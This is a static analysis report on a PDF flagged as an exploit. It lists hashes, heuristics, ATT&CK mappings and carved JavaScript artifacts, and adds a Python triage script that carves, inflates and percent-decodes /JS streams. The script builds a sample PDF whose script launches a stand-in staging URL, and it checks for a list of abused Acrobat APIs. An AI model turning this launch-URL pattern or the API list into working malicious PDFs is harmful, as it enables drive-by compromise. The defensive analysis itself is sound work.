Malicious PDF — malware analysis report

Static analysis result for SHA-256 b540b1bed77ef935…

Verdict: MALICIOUS
File type: PDF
Size: 45.0 KB
MD5: 5eb43fd542433b44e231ce5b83c2ed6f
SHA-1: 40d7d33a203643b38a44dfaa0e8bd3456503ef59
SHA-256: b540b1bed77ef9350bf9885731b78901d041355578b40eae1861ef072ab0fd55
Risk score: 76

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File

The critical ClamAV signature 'Pdf.Exploit.Agent-36128' is the primary basis for the verdict. The 'PDF_JAVASCRIPT' and 'PDF_JS' heuristics confirm that the document carries a /JavaScript action backed by a /JS stream; on their own they are low severity, because benign forms use JavaScript too, but together with the signature hit they point to script-driven exploitation rather than form logic. The carved /JS stream (45,305 bytes) still yields 33,047 bytes of script after two rounds of percent-decoding, far more than a form handler needs and consistent with obfuscated logic that stages a secondary payload. That behaviour, and the PowerShell stage implied by the T1059.001 mapping, should be confirmed by reading the decoded script, since nothing in the extracted artifacts below shows PowerShell directly.

Heuristics (3)

  • ClamAV: Pdf.Exploit.Agent-36128 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • JavaScript action (severity: low, rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low, rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • javascript_obj0008_000.js
    SHA-256: 4ce48a415a828290e151385a1d53b25ef7d59000eb7bcc61269ef4751ddade0d
    Kind: pdf-javascript-stream
    Source: PDF /JS object 8 at offset 0x1E7
    Size: 45305 bytes
  • legacy_pdfkit_stage_000.js
    SHA-256: 2de49a0d4f0d06b23eace976e99ecc92fa41f23fdd479da1a5b6fc978ced988e
    Kind: deobfuscated-js
    Source: double percent-decoded annotation JavaScript at offset 0x1E7
    Size: 33047 bytes
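The heuristics and artifact entries above describe a small triage pipeline: find the /JavaScript action, follow its /JS reference to the stream object, carve and inflate the stream, then strip the layers of percent-encoding to get at the real script. The script below is an added example written for this page, not the analysis platform's own code. It runs those steps on a constructed sample PDF (an /OpenAction whose /JS points at a FlateDecode stream holding a script that was percent-encoded twice), also handles the inline `/JS (...)` literal form that this sample does not use, caps inflation so a crafted stream cannot exhaust memory, and checks for a short list of risky Acrobat APIs; that list, the sample file and all function names are assumptions of the example rather than the report's scoring rules.

```python
"""Added example: carve PDF JavaScript, follow /JS references, inflate streams,
peel percent-encoding layers, and flag risky Acrobat APIs."""
import hashlib
import re
import zlib
from urllib.parse import quote, unquote

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_RE = re.compile(rb"\bstream\r?\n(.*?)\r?\nendstream", re.S)
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R\b")
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")
MAX_STREAM = 16 * 1024 * 1024   # inflation cap: a crafted stream must not exhaust memory
# Acrobat JS APIs often abused by exploit PDFs; an illustrative list assumed for
# this example, not the scoring rules of the scanner behind the report.
RISKY_APIS = ("app.launchURL", "util.printf", "Collab.", "exportDataObject",
              "media.newPlayer", "eval(", "unescape(")

def index_objects(pdf: bytes) -> dict:
    """Object number -> (offset, body); raw scan, so a forged xref hides nothing."""
    return {int(m.group(1)): (m.start(), m.group(3)) for m in OBJ_RE.finditer(pdf)}

def decode_stream(body: bytes):
    """Stream payload of an object body (inflated when /FlateDecode), or None."""
    m = STREAM_RE.search(body)
    if not m:
        return None
    data = m.group(1)
    return zlib.decompressobj().decompress(data, MAX_STREAM) if b"/FlateDecode" in body else data

def read_literal_string(body: bytes, start: int) -> bytes:
    """PDF literal string whose '(' is at body[start], honouring nested
    parentheses; backslash escapes are not handled in this simplified reader."""
    depth, out = 0, bytearray()
    for c in body[start:]:
        ch = bytes([c])
        if ch == b"(" and depth == 0:          # the string's own opening parenthesis
            depth = 1
            continue
        depth += (ch == b"(") - (ch == b")")
        if depth == 0:
            break
        out += ch
    return bytes(out)

def carve_javascript(pdf: bytes) -> list:
    """One record per object carrying a /JavaScript action or a /JS key."""
    objs, found = index_objects(pdf), []
    for num, (offset, body) in sorted(objs.items()):
        fired = [h for h, key in (("PDF_JAVASCRIPT", b"/JavaScript"),
                                  ("PDF_JS", b"/JS")) if key in body]
        if not fired:
            continue
        script = source = None
        ref, lit = JS_REF_RE.search(body), body.find(b"/JS")
        if ref and int(ref.group(1)) in objs:           # /JS 4 0 R -> stream object
            target = int(ref.group(1))
            script = decode_stream(objs[target][1])
            source = f"/JS object {target} at offset {objs[target][0]:#x}"
        elif lit >= 0 and body[lit + 3:].lstrip().startswith(b"("):    # /JS (...)
            script = read_literal_string(body, body.index(b"(", lit))
            source = f"/JS literal in object {num}"
        found.append({"obj": num, "offset": offset, "heuristics": fired,
                      "source": source, "script": script})
    return found

def peel_percent_encoding(script: bytes, max_layers: int = 8) -> tuple:
    """Percent-decode until stable; a script's own %XX sequences decode too, so
    the returned layer count is an upper bound on the obfuscation depth."""
    text, layers = script.decode("latin-1"), 0
    while layers < max_layers and PCT_RE.search(text):
        decoded = unquote(text, encoding="latin-1")
        if decoded == text:
            break
        text, layers = decoded, layers + 1
    return text, layers

def triage(pdf: bytes) -> dict:
    """Fired heuristics plus one artifact record per carved script."""
    heuristics, artifacts = set(), []
    for rec in carve_javascript(pdf):
        heuristics.update(rec["heuristics"])
        if rec["script"] is None:
            continue
        text, layers = peel_percent_encoding(rec["script"])
        artifacts.append({"object": rec["obj"], "source": rec["source"],
                          "raw_sha256": hashlib.sha256(rec["script"]).hexdigest(),
                          "raw_size": len(rec["script"]), "decoded_size": len(text),
                          "percent_layers": layers, "decoded_script": text,
                          "risky_apis": [a for a in RISKY_APIS if a in text]})
    return {"heuristics": sorted(heuristics), "artifacts": artifacts}

def build_sample_pdf() -> bytes:
    """Constructed sample (not the report's file): /OpenAction -> /JS reference
    -> FlateDecode stream holding a script percent-encoded twice."""
    inner = 'var u = "http://example.invalid/stage"; app.launchURL(u, true);'
    data = zlib.compress(quote(quote(inner, safe=""), safe="").encode("ascii"))
    head = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(data)).encode() + b" /Filter /FlateDecode >>\n")
    return head + b"stream\n" + data + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"

if __name__ == "__main__":
    print(triage(build_sample_pdf()))
```

On the constructed sample, `triage` reports both low-severity heuristics, one artifact whose source is the referenced stream object, two percent-encoding layers, and a hit on `app.launchURL`. The raw scan deliberately ignores the xref table and /Length values, because malicious PDFs routinely have broken ones; the trade-off is that objects inside object streams (/ObjStm) are not seen, which a full parser would handle.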